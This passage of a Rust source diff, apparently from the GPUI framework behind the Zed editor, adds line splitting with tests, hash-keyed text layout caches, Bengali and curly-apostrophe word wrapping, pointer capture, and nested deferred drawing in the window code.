+ font_size: self.layout.font_size,
+ width: left_width,
+ ascent: self.layout.ascent,
+ descent: self.layout.descent,
+ runs: left_runs,
+ len: byte_index,
+ }),
+ text: left_text,
+ decoration_runs: left_decorations,
+ };
+
+ let right = ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: self.layout.font_size,
+ width: right_width,
+ ascent: self.layout.ascent,
+ descent: self.layout.descent,
+ runs: right_runs,
+ len: self.layout.len - byte_index,
+ }),
+ text: right_text,
+ decoration_runs: right_decorations,
+ };
+
+ (left, right)
+ }
}
/// A line of text that has been shaped, decorated, and wrapped by the text layout system.
@@ -594,3 +728,268 @@ fn aligned_origin_x(
TextAlign::Right => origin.x + align_width - line_width,
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{FontId, GlyphId};
+
+ /// Helper: build a ShapedLine from glyph descriptors without the platform text system.
+ /// Each glyph is described as (byte_index, x_position).
+ fn make_shaped_line(
+ text: &str,
+ glyphs: &[(usize, f32)],
+ width: f32,
+ decorations: &[DecorationRun],
+ ) -> ShapedLine {
+ let shaped_glyphs: Vec<ShapedGlyph> = glyphs
+ .iter()
+ .map(|&(index, x)| ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(x), px(0.0)),
+ index,
+ is_emoji: false,
+ })
+ .collect();
+
+ ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: px(16.0),
+ width: px(width),
+ ascent: px(12.0),
+ descent: px(4.0),
+ runs: vec![ShapedRun {
+ font_id: FontId(0),
+ glyphs: shaped_glyphs,
+ }],
+ len: text.len(),
+ }),
+ text: SharedString::new(text.to_string()),
+ decoration_runs: SmallVec::from(decorations.to_vec()),
+ }
+ }
+
+ #[test]
+ fn test_split_at_invariants() {
+ // Split "abcdef" at every possible byte index and verify structural invariants.
+ let line = make_shaped_line(
+ "abcdef",
+ &[
+ (0, 0.0),
+ (1, 10.0),
+ (2, 20.0),
+ (3, 30.0),
+ (4, 40.0),
+ (5, 50.0),
+ ],
+ 60.0,
+ &[],
+ );
+
+ for i in 0..=6 {
+ let (left, right) = line.split_at(i);
+
+ assert_eq!(
+ left.width() + right.width(),
+ line.width(),
+ "widths must sum at split={i}"
+ );
+ assert_eq!(
+ left.len() + right.len(),
+ line.len(),
+ "lengths must sum at split={i}"
+ );
+ assert_eq!(
+ format!("{}{}", left.text.as_ref(), right.text.as_ref()),
+ "abcdef",
+ "text must concatenate at split={i}"
+ );
+ assert_eq!(left.font_size, line.font_size, "font_size at split={i}");
+ assert_eq!(right.ascent, line.ascent, "ascent at split={i}");
+ assert_eq!(right.descent, line.descent, "descent at split={i}");
+ }
+
+ // Edge: split at 0 produces no left runs, full content on right
+ let (left, right) = line.split_at(0);
+ assert_eq!(left.runs.len(), 0);
+ assert_eq!(right.runs[0].glyphs.len(), 6);
+
+ // Edge: split at end produces full content on left, no right runs
+ let (left, right) = line.split_at(6);
+ assert_eq!(left.runs[0].glyphs.len(), 6);
+ assert_eq!(right.runs.len(), 0);
+ }
+
+ #[test]
+ fn test_split_at_glyph_rebasing() {
+ // Two font runs (simulating a font fallback boundary at byte 3):
+ // run A (FontId 0): glyphs at bytes 0,1,2 positions 0,10,20
+ // run B (FontId 1): glyphs at bytes 3,4,5 positions 30,40,50
+ // Successive splits simulate the incremental splitting done during wrap.
+ let line = ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: px(16.0),
+ width: px(60.0),
+ ascent: px(12.0),
+ descent: px(4.0),
+ runs: vec![
+ ShapedRun {
+ font_id: FontId(0),
+ glyphs: vec![
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(0.0), px(0.0)),
+ index: 0,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(10.0), px(0.0)),
+ index: 1,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(20.0), px(0.0)),
+ index: 2,
+ is_emoji: false,
+ },
+ ],
+ },
+ ShapedRun {
+ font_id: FontId(1),
+ glyphs: vec![
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(30.0), px(0.0)),
+ index: 3,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(40.0), px(0.0)),
+ index: 4,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(50.0), px(0.0)),
+ index: 5,
+ is_emoji: false,
+ },
+ ],
+ },
+ ],
+ len: 6,
+ }),
+ text: SharedString::new("abcdef".to_string()),
+ decoration_runs: SmallVec::new(),
+ };
+
+ // First split at byte 2 — mid-run in run A
+ let (first, remainder) = line.split_at(2);
+ assert_eq!(first.text.as_ref(), "ab");
+ assert_eq!(first.runs.len(), 1);
+ assert_eq!(first.runs[0].font_id, FontId(0));
+
+ // Remainder "cdef" should have two runs: tail of A (1 glyph) + all of B (3 glyphs)
+ assert_eq!(remainder.text.as_ref(), "cdef");
+ assert_eq!(remainder.runs.len(), 2);
+ assert_eq!(remainder.runs[0].font_id, FontId(0));
+ assert_eq!(remainder.runs[0].glyphs.len(), 1);
+ assert_eq!(remainder.runs[0].glyphs[0].index, 0);
+ assert_eq!(remainder.runs[0].glyphs[0].position.x, px(0.0));
+ assert_eq!(remainder.runs[1].font_id, FontId(1));
+ assert_eq!(remainder.runs[1].glyphs[0].index, 1);
+ assert_eq!(remainder.runs[1].glyphs[0].position.x, px(10.0));
+
+ // Second split at byte 2 within remainder — crosses the run boundary
+ let (second, final_part) = remainder.split_at(2);
+ assert_eq!(second.text.as_ref(), "cd");
+ assert_eq!(final_part.text.as_ref(), "ef");
+ assert_eq!(final_part.runs[0].glyphs[0].index, 0);
+ assert_eq!(final_part.runs[0].glyphs[0].position.x, px(0.0));
+
+ // Widths must sum across all three pieces
+ assert_eq!(
+ first.width() + second.width() + final_part.width(),
+ line.width()
+ );
+ }
+
+ #[test]
+ fn test_split_at_decorations() {
+ // Three decoration runs: red [0..2), green [2..5), blue [5..6).
+ // Split at byte 3 — red goes entirely left, green straddles, blue goes entirely right.
+ let red = Hsla {
+ h: 0.0,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+ let green = Hsla {
+ h: 0.3,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+ let blue = Hsla {
+ h: 0.6,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+
+ let line = make_shaped_line(
+ "abcdef",
+ &[
+ (0, 0.0),
+ (1, 10.0),
+ (2, 20.0),
+ (3, 30.0),
+ (4, 40.0),
+ (5, 50.0),
+ ],
+ 60.0,
+ &[
+ DecorationRun {
+ len: 2,
+ color: red,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ DecorationRun {
+ len: 3,
+ color: green,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ DecorationRun {
+ len: 1,
+ color: blue,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ ],
+ );
+
+ let (left, right) = line.split_at(3);
+
+ // Left: red(2) + green(1) — green straddled, left portion has len 1
+ assert_eq!(left.decoration_runs.len(), 2);
+ assert_eq!(left.decoration_runs[0].len, 2);
+ assert_eq!(left.decoration_runs[0].color, red);
+ assert_eq!(left.decoration_runs[1].len, 1);
+ assert_eq!(left.decoration_runs[1].color, green);
+
+ // Right: green(2) + blue(1) — green straddled, right portion has len 2
+ assert_eq!(right.decoration_runs.len(), 2);
+ assert_eq!(right.decoration_runs[0].len, 2);
+ assert_eq!(right.decoration_runs[0].color, green);
+ assert_eq!(right.decoration_runs[1].len, 1);
+ assert_eq!(right.decoration_runs[1].color, blue);
+ }
+}
@@ -401,12 +401,25 @@ struct FrameCache {
wrapped_lines: FxHashMap<Arc<CacheKey>, Arc<WrappedLineLayout>>,
used_lines: Vec<Arc<CacheKey>>,
used_wrapped_lines: Vec<Arc<CacheKey>>,
+
+ // Content-addressable caches keyed by caller-provided text hash + layout params.
+ // These allow cache hits without materializing a contiguous `SharedString`.
+ //
+ // IMPORTANT: To support allocation-free lookups, we store these maps using a key type
+ // (`HashedCacheKeyRef`) that can be computed without building a contiguous `&str`/`SharedString`.
+ // On miss, we allocate once and store under an owned `HashedCacheKey`.
+ lines_by_hash: FxHashMap<Arc<HashedCacheKey>, Arc<LineLayout>>,
+ wrapped_lines_by_hash: FxHashMap<Arc<HashedCacheKey>, Arc<WrappedLineLayout>>,
+ used_lines_by_hash: Vec<Arc<HashedCacheKey>>,
+ used_wrapped_lines_by_hash: Vec<Arc<HashedCacheKey>>,
}
#[derive(Clone, Default)]
pub(crate) struct LineLayoutIndex {
lines_index: usize,
wrapped_lines_index: usize,
+ lines_by_hash_index: usize,
+ wrapped_lines_by_hash_index: usize,
}
impl LineLayoutCache {
@@ -423,6 +436,8 @@ impl LineLayoutCache {
LineLayoutIndex {
lines_index: frame.used_lines.len(),
wrapped_lines_index: frame.used_wrapped_lines.len(),
+ lines_by_hash_index: frame.used_lines_by_hash.len(),
+ wrapped_lines_by_hash_index: frame.used_wrapped_lines_by_hash.len(),
}
}
@@ -445,6 +460,24 @@ impl LineLayoutCache {
}
current_frame.used_wrapped_lines.push(key.clone());
}
+
+ for key in &previous_frame.used_lines_by_hash
+ [range.start.lines_by_hash_index..range.end.lines_by_hash_index]
+ {
+ if let Some((key, line)) = previous_frame.lines_by_hash.remove_entry(key) {
+ current_frame.lines_by_hash.insert(key, line);
+ }
+ current_frame.used_lines_by_hash.push(key.clone());
+ }
+
+ for key in &previous_frame.used_wrapped_lines_by_hash
+ [range.start.wrapped_lines_by_hash_index..range.end.wrapped_lines_by_hash_index]
+ {
+ if let Some((key, line)) = previous_frame.wrapped_lines_by_hash.remove_entry(key) {
+ current_frame.wrapped_lines_by_hash.insert(key, line);
+ }
+ current_frame.used_wrapped_lines_by_hash.push(key.clone());
+ }
}
pub fn truncate_layouts(&self, index: LineLayoutIndex) {
@@ -453,6 +486,12 @@ impl LineLayoutCache {
current_frame
.used_wrapped_lines
.truncate(index.wrapped_lines_index);
+ current_frame
+ .used_lines_by_hash
+ .truncate(index.lines_by_hash_index);
+ current_frame
+ .used_wrapped_lines_by_hash
+ .truncate(index.wrapped_lines_by_hash_index);
}
pub fn finish_frame(&self) {
@@ -463,6 +502,11 @@ impl LineLayoutCache {
curr_frame.wrapped_lines.clear();
curr_frame.used_lines.clear();
curr_frame.used_wrapped_lines.clear();
+
+ curr_frame.lines_by_hash.clear();
+ curr_frame.wrapped_lines_by_hash.clear();
+ curr_frame.used_lines_by_hash.clear();
+ curr_frame.used_wrapped_lines_by_hash.clear();
}
pub fn layout_wrapped_line<Text>(
@@ -590,6 +634,165 @@ impl LineLayoutCache {
layout
}
}
+
+ /// Try to retrieve a previously-shaped line layout using a caller-provided content hash.
+ ///
+ /// This is a *non-allocating* cache probe: it does not materialize any text. If the layout
+ /// is not already cached in either the current frame or previous frame, returns `None`.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn try_layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[FontRun],
+ force_width: Option<Pixels>,
+ ) -> Option<Arc<LineLayout>> {
+ let key_ref = HashedCacheKeyRef {
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ wrap_width: None,
+ force_width,
+ };
+
+ let current_frame = self.current_frame.read();
+ if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return Some(layout.clone());
+ }
+
+ let previous_frame = self.previous_frame.lock();
+ if let Some((_, layout)) = previous_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return Some(layout.clone());
+ }
+
+ None
+ }
+
+ /// Layout a line of text using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for `text`.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[FontRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> Arc<LineLayout> {
+ let key_ref = HashedCacheKeyRef {
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ wrap_width: None,
+ force_width,
+ };
+
+ // Fast path: already cached (no allocation).
+ let current_frame = self.current_frame.upgradable_read();
+ if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return layout.clone();
+ }
+
+ let mut current_frame = RwLockUpgradableReadGuard::upgrade(current_frame);
+
+ // Try to reuse from previous frame without allocating; do a linear scan to find a matching key.
+ // (We avoid `drain()` here because it would eagerly move all entries.)
+ let mut previous_frame = self.previous_frame.lock();
+ if let Some(existing_key) = previous_frame
+ .used_lines_by_hash
+ .iter()
+ .find(|key| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ })
+ .cloned()
+ {
+ if let Some((key, layout)) = previous_frame.lines_by_hash.remove_entry(&existing_key) {
+ current_frame
+ .lines_by_hash
+ .insert(key.clone(), layout.clone());
+ current_frame.used_lines_by_hash.push(key);
+ return layout;
+ }
+ }
+
+ let text = materialize_text();
+ let mut layout = self
+ .platform_text_system
+ .layout_line(&text, font_size, runs);
+
+ if let Some(force_width) = force_width {
+ let mut glyph_pos = 0;
+ for run in layout.runs.iter_mut() {
+ for glyph in run.glyphs.iter_mut() {
+ if (glyph.position.x - glyph_pos * force_width).abs() > px(1.) {
+ glyph.position.x = glyph_pos * force_width;
+ }
+ glyph_pos += 1;
+ }
+ }
+ }
+
+ let key = Arc::new(HashedCacheKey {
+ text_hash,
+ text_len,
+ font_size,
+ runs: SmallVec::from(runs),
+ wrap_width: None,
+ force_width,
+ });
+ let layout = Arc::new(layout);
+ current_frame
+ .lines_by_hash
+ .insert(key.clone(), layout.clone());
+ current_frame.used_lines_by_hash.push(key);
+ layout
+ }
}
/// A run of text with a single font.
@@ -622,12 +825,80 @@ struct CacheKeyRef<'a> {
force_width: Option<Pixels>,
}
+#[derive(Clone, Debug)]
+struct HashedCacheKey {
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: SmallVec<[FontRun; 1]>,
+ wrap_width: Option<Pixels>,
+ force_width: Option<Pixels>,
+}
+
+#[derive(Copy, Clone)]
+struct HashedCacheKeyRef<'a> {
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &'a [FontRun],
+ wrap_width: Option<Pixels>,
+ force_width: Option<Pixels>,
+}
+
impl PartialEq for dyn AsCacheKeyRef + '_ {
fn eq(&self, other: &dyn AsCacheKeyRef) -> bool {
self.as_cache_key_ref() == other.as_cache_key_ref()
}
}
+impl PartialEq for HashedCacheKey {
+ fn eq(&self, other: &Self) -> bool {
+ self.text_hash == other.text_hash
+ && self.text_len == other.text_len
+ && self.font_size == other.font_size
+ && self.runs.as_slice() == other.runs.as_slice()
+ && self.wrap_width == other.wrap_width
+ && self.force_width == other.force_width
+ }
+}
+
+impl Eq for HashedCacheKey {}
+
+impl Hash for HashedCacheKey {
+ fn hash<H: Hasher>(&self, state: &mut H) {
+ self.text_hash.hash(state);
+ self.text_len.hash(state);
+ self.font_size.hash(state);
+ self.runs.as_slice().hash(state);
+ self.wrap_width.hash(state);
+ self.force_width.hash(state);
+ }
+}
+
+impl PartialEq for HashedCacheKeyRef<'_> {
+ fn eq(&self, other: &Self) -> bool {
+ self.text_hash == other.text_hash
+ && self.text_len == other.text_len
+ && self.font_size == other.font_size
+ && self.runs == other.runs
+ && self.wrap_width == other.wrap_width
+ && self.force_width == other.force_width
+ }
+}
+
+impl Eq for HashedCacheKeyRef<'_> {}
+
+impl Hash for HashedCacheKeyRef<'_> {
+ fn hash<H: Hasher>(&self, state: &mut H) {
+ self.text_hash.hash(state);
+ self.text_len.hash(state);
+ self.font_size.hash(state);
+ self.runs.hash(state);
+ self.wrap_width.hash(state);
+ self.force_width.hash(state);
+ }
+}
+
impl Eq for dyn AsCacheKeyRef + '_ {}
impl Hash for dyn AsCacheKeyRef + '_ {
@@ -236,10 +236,13 @@ impl LineWrapper {
matches!(c, '\u{1E00}'..='\u{1EFF}') || // Latin Extended Additional
matches!(c, '\u{0300}'..='\u{036F}') || // Combining Diacritical Marks
+ // Bengali (https://en.wikipedia.org/wiki/Bengali_(Unicode_block))
+ matches!(c, '\u{0980}'..='\u{09FF}') ||
+
// Some other known special characters that should be treated as word characters,
- // e.g. `a-b`, `var_name`, `I'm`, '@mention`, `#hashtag`, `100%`, `3.1415`,
+ // e.g. `a-b`, `var_name`, `I'm`/`won’t`, `@mention`, `#hashtag`, `100%`, `3.1415`,
// `2^3`, `a~b`, `a=1`, `Self::new`, etc.
- matches!(c, '-' | '_' | '.' | '\'' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') ||
+ matches!(c, '-' | '_' | '.' | '\'' | '’' | '‘' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') ||
// `⋯` character is special used in Zed, to keep this at the end of the line.
matches!(c, '⋯')
}
@@ -835,6 +838,8 @@ mod tests {
assert_word("a=1");
assert_word("Self::is_word_char");
assert_word("more⋯");
+ assert_word("won’t");
+ assert_word("‘twas");
// Space
assert_not_word("foo bar");
@@ -856,6 +861,10 @@ mod tests {
assert_word("АБВГДЕЖЗИЙКЛМНОП");
// Vietnamese (https://github.com/zed-industries/zed/issues/23245)
assert_word("ThậmchíđếnkhithuachạychúngcònnhẫntâmgiếtnốtsốđôngtùchínhtrịởYênBáivàCaoBằng");
+ // Bengali
+ assert_word("গিয়েছিলেন");
+ assert_word("ছেলে");
+ assert_word("হচ্ছিল");
// non-word characters
assert_not_word("你好");
@@ -560,12 +560,20 @@ pub enum WindowControlArea {
pub struct HitboxId(u64);
impl HitboxId {
- /// Checks if the hitbox with this ID is currently hovered. Except when handling
+ /// Checks if the hitbox with this ID is currently hovered. Returns `false` during keyboard
+ /// input modality so that keyboard navigation suppresses hover highlights. Except when handling
/// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse
/// events or paint hover styles.
///
/// See [`Hitbox::is_hovered`] for details.
pub fn is_hovered(self, window: &Window) -> bool {
+ // If this hitbox has captured the pointer, it's always considered hovered
+ if window.captured_hitbox == Some(self) {
+ return true;
+ }
+ if window.last_input_was_keyboard() {
+ return false;
+ }
let hit_test = &window.mouse_hit_test;
for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) {
if self == *id {
@@ -604,13 +612,15 @@ pub struct Hitbox {
}
impl Hitbox {
- /// Checks if the hitbox is currently hovered. Except when handling `ScrollWheelEvent`, this is
- /// typically what you want when determining whether to handle mouse events or paint hover
- /// styles.
+ /// Checks if the hitbox is currently hovered. Returns `false` during keyboard input modality
+ /// so that keyboard navigation suppresses hover highlights. Except when handling
+ /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse
+ /// events or paint hover styles.
///
/// This can return `false` even when the hitbox contains the mouse, if a hitbox in front of
/// this sets `HitboxBehavior::BlockMouse` (`InteractiveElement::occlude`) or
- /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`).
+ /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`),
+ /// or if the current input modality is keyboard (see [`Window::last_input_was_keyboard`]).
///
/// Handling of `ScrollWheelEvent` should typically use `should_handle_scroll` instead.
/// Concretely, this is due to use-cases like overlays that cause the elements under to be
@@ -822,6 +832,11 @@ impl Frame {
self.tab_stops.clear();
self.focus = None;
+ #[cfg(any(test, feature = "test-support"))]
+ {
+ self.debug_bounds.clear();
+ }
+
#[cfg(any(feature = "inspector", debug_assertions))]
{
self.next_inspector_instance_ids.clear();
@@ -936,6 +951,7 @@ pub struct Window {
pub(crate) bounds_observers: SubscriberSet<(), AnyObserver>,
appearance: WindowAppearance,
pub(crate) appearance_observers: SubscriberSet<(), AnyObserver>,
+ pub(crate) button_layout_observers: SubscriberSet<(), AnyObserver>,
active: Rc<Cell<bool>>,
hovered: Rc<Cell<bool>>,
pub(crate) needs_present: Rc<Cell<bool>>,
@@ -952,6 +968,9 @@ pub struct Window {
pub(crate) pending_input_observers: SubscriberSet<(), AnyObserver>,
prompt: Option<RenderablePromptHandle>,
pub(crate) client_inset: Option<Pixels>,
+ /// The hitbox that has captured the pointer, if any.
+ /// While captured, mouse events route to this hitbox regardless of hit testing.
+ captured_hitbox: Option<HitboxId>,
#[cfg(any(feature = "inspector", debug_assertions))]
inspector: Option<Entity<Inspector>>,
}
@@ -1270,6 +1289,14 @@ impl Window {
.log_err();
}
}));
+ platform_window.on_button_layout_changed(Box::new({
+ let mut cx = cx.to_async();
+ move || {
+ handle
+ .update(&mut cx, |_, window, cx| window.button_layout_changed(cx))
+ .log_err();
+ }
+ }));
platform_window.on_active_status_change(Box::new({
let mut cx = cx.to_async();
move |active| {
@@ -1424,6 +1451,7 @@ impl Window {
bounds_observers: SubscriberSet::new(),
appearance,
appearance_observers: SubscriberSet::new(),
+ button_layout_observers: SubscriberSet::new(),
active,
hovered,
needs_present,
@@ -1439,6 +1467,7 @@ impl Window {
prompt: None,
client_inset: None,
image_cache_stack: Vec::new(),
+ captured_hitbox: None,
#[cfg(any(feature = "inspector", debug_assertions))]
inspector: None,
})
@@ -1515,6 +1544,22 @@ impl Window {
subscription
}
+ /// Registers a callback to be invoked when the window button layout changes.
+ pub fn observe_button_layout_changed(
+ &self,
+ mut callback: impl FnMut(&mut Window, &mut App) + 'static,
+ ) -> Subscription {
+ let (subscription, activate) = self.button_layout_observers.insert(
+ (),
+ Box::new(move |window, cx| {
+ callback(window, cx);
+ true
+ }),
+ );
+ activate();
+ subscription
+ }
+
/// Replaces the root entity of the window with a new one.
pub fn replace_root<E>(
&mut self,
@@ -1888,7 +1933,12 @@ impl Window {
})
}
- fn bounds_changed(&mut self, cx: &mut App) {
+ /// Notify the window that its bounds have changed.
+ ///
+ /// This updates internal state like `viewport_size` and `scale_factor` from
+ /// the platform window, then notifies observers. Normally called automatically
+ /// by the platform's resize callback, but exposed publicly for test infrastructure.
+ pub fn bounds_changed(&mut self, cx: &mut App) {
self.scale_factor = self.platform_window.scale_factor();
self.viewport_size = self.platform_window.content_size();
self.display_id = self.platform_window.display().map(|display| display.id());
@@ -1932,6 +1982,12 @@ impl Window {
.retain(&(), |callback| callback(self, cx));
}
+ pub(crate) fn button_layout_changed(&mut self, cx: &mut App) {
+ self.button_layout_observers
+ .clone()
+ .retain(&(), |callback| callback(self, cx));
+ }
+
/// Returns the appearance of the current window.
pub fn appearance(&self) -> WindowAppearance {
self.appearance
@@ -2144,6 +2200,26 @@ impl Window {
self.mouse_position
}
+ /// Captures the pointer for the given hitbox. While captured, all mouse move and mouse up
+ /// events will be routed to listeners that check this hitbox's `is_hovered` status,
+ /// regardless of actual hit testing. This enables drag operations that continue
+ /// even when the pointer moves outside the element's bounds.
+ ///
+ /// The capture is automatically released on mouse up.
+ pub fn capture_pointer(&mut self, hitbox_id: HitboxId) {
+ self.captured_hitbox = Some(hitbox_id);
+ }
+
+ /// Releases any active pointer capture.
+ pub fn release_pointer(&mut self) {
+ self.captured_hitbox = None;
+ }
+
+ /// Returns the hitbox that has captured the pointer, if any.
+ pub fn captured_hitbox(&self) -> Option<HitboxId> {
+ self.captured_hitbox
+ }
+
/// The current state of the keyboard's modifiers
pub fn modifiers(&self) -> Modifiers {
self.modifiers
@@ -2300,10 +2376,7 @@ impl Window {
#[cfg(any(feature = "inspector", debug_assertions))]
let inspector_element = self.prepaint_inspector(_inspector_width, cx);
- let mut sorted_deferred_draws =
- (0..self.next_frame.deferred_draws.len()).collect::<SmallVec<[_; 8]>>();
- sorted_deferred_draws.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority);
- self.prepaint_deferred_draws(&sorted_deferred_draws, cx);
+ self.prepaint_deferred_draws(cx);
let mut prompt_element = None;
let mut active_drag_element = None;
@@ -2332,7 +2405,7 @@ impl Window {
#[cfg(any(feature = "inspector", debug_assertions))]
self.paint_inspector(inspector_element, cx);
- self.paint_deferred_draws(&sorted_deferred_draws, cx);
+ self.paint_deferred_draws(cx);
if let Some(mut prompt_element) = prompt_element {
prompt_element.paint(self, cx);
@@ -2415,25 +2488,40 @@ impl Window {
None
}
- fn prepaint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) {
+ fn prepaint_deferred_draws(&mut self, cx: &mut App) {
assert_eq!(self.element_id_stack.len(), 0);
- let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
- for deferred_draw_ix in deferred_draw_indices {
- let deferred_draw = &mut deferred_draws[*deferred_draw_ix];
- self.element_id_stack
- .clone_from(&deferred_draw.element_id_stack);
- self.text_style_stack
- .clone_from(&deferred_draw.text_style_stack);
- self.next_frame
- .dispatch_tree
- .set_active_node(deferred_draw.parent_node);
+ let mut completed_draws = Vec::new();
+
+ // Process deferred draws in multiple rounds to support nesting.
+ // Each round processes all current deferred draws, which may produce new ones.
+ let mut depth = 0;
+ loop {
+ // Limit maximum nesting depth to prevent infinite loops.
+ assert!(depth < 10, "Exceeded maximum (10) deferred depth");
+ depth += 1;
+ let deferred_count = self.next_frame.deferred_draws.len();
+ if deferred_count == 0 {
+ break;
+ }
- let prepaint_start = self.prepaint_index();
- let content_mask = deferred_draw.content_mask.clone();
- if let Some(element) = deferred_draw.element.as_mut() {
- self.with_rendered_view(deferred_draw.current_view, |window| {
- window.with_content_mask(content_mask, |window| {
+ // Sort by priority for this round
+ let traversal_order = self.deferred_draw_traversal_order();
+ let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
+
+ for deferred_draw_ix in traversal_order {
+ let deferred_draw = &mut deferred_draws[deferred_draw_ix];
+ self.element_id_stack
+ .clone_from(&deferred_draw.element_id_stack);
+ self.text_style_stack
+ .clone_from(&deferred_draw.text_style_stack);
+ self.next_frame
+ .dispatch_tree
+ .set_active_node(deferred_draw.parent_node);
+
+ let prepaint_start = self.prepaint_index();
+ if let Some(element) = deferred_draw.element.as_mut() {
+ self.with_rendered_view(deferred_draw.current_view, |window| {
window.with_rem_size(Some(deferred_draw.rem_size), |window| {
window.with_absolute_element_offset(
deferred_draw.absolute_offset,
@@ -2442,30 +2530,38 @@ impl Window {
},
);
});
- });
- })
- } else {
- self.reuse_prepaint(deferred_draw.prepaint_range.clone());
+ })
+ } else {
+ self.reuse_prepaint(deferred_draw.prepaint_range.clone());
+ }
+ let prepaint_end = self.prepaint_index();
+ deferred_draw.prepaint_range = prepaint_start..prepaint_end;
}
- let prepaint_end = self.prepaint_index();
- deferred_draw.prepaint_range = prepaint_start..prepaint_end;
+
+ // Save completed draws and continue with newly added ones
+ completed_draws.append(&mut deferred_draws);
+
+ self.element_id_stack.clear();
+ self.text_style_stack.clear();
}
- assert_eq!(
- self.next_frame.deferred_draws.len(),
- 0,
- "cannot call defer_draw during deferred drawing"
- );
- self.next_frame.deferred_draws = deferred_draws;
- self.element_id_stack.clear();
- self.text_style_stack.clear();
+
+ // Restore all completed draws
+ self.next_frame.deferred_draws = completed_draws;
}
- fn paint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) {
+ fn paint_deferred_draws(&mut self, cx: &mut App) {
assert_eq!(self.element_id_stack.len(), 0);
+ // Paint all deferred draws in priority order.
+ // Since prepaint has already processed nested deferreds, we just paint them all.
+ if self.next_frame.deferred_draws.len() == 0 {
+ return;
+ }
+
+ let traversal_order = self.deferred_draw_traversal_order();
let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
- for deferred_draw_ix in deferred_draw_indices {
- let mut deferred_draw = &mut deferred_draws[*deferred_draw_ix];
+ for deferred_draw_ix in traversal_order {
+ let mut deferred_draw = &mut deferred_draws[deferred_draw_ix];
self.element_id_stack
.clone_from(&deferred_draw.element_id_stack);
self.next_frame
@@ -2492,6 +2588,13 @@ impl Window {
self.element_id_stack.clear();
}
+ fn deferred_draw_traversal_order(&mut self) -> SmallVec<[usize; 8]> {
+ let deferred_count = self.next_frame.deferred_draws.len();
+ let mut sorted_indices = (0..deferred_count).collect::<SmallVec<[_; 8]>>();
+ sorted_indices.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority);
+ sorted_indices
+ }
+
pub(crate) fn prepaint_index(&self) -> PrepaintStateIndex {
PrepaintStateIndex {
hitboxes_index: self.next_frame.hitboxes.len(),
@@ -3295,6 +3398,100 @@ impl Window {
Ok(())
}
+ /// Paints a monochrome glyph with pre-computed raster bounds.
+ ///
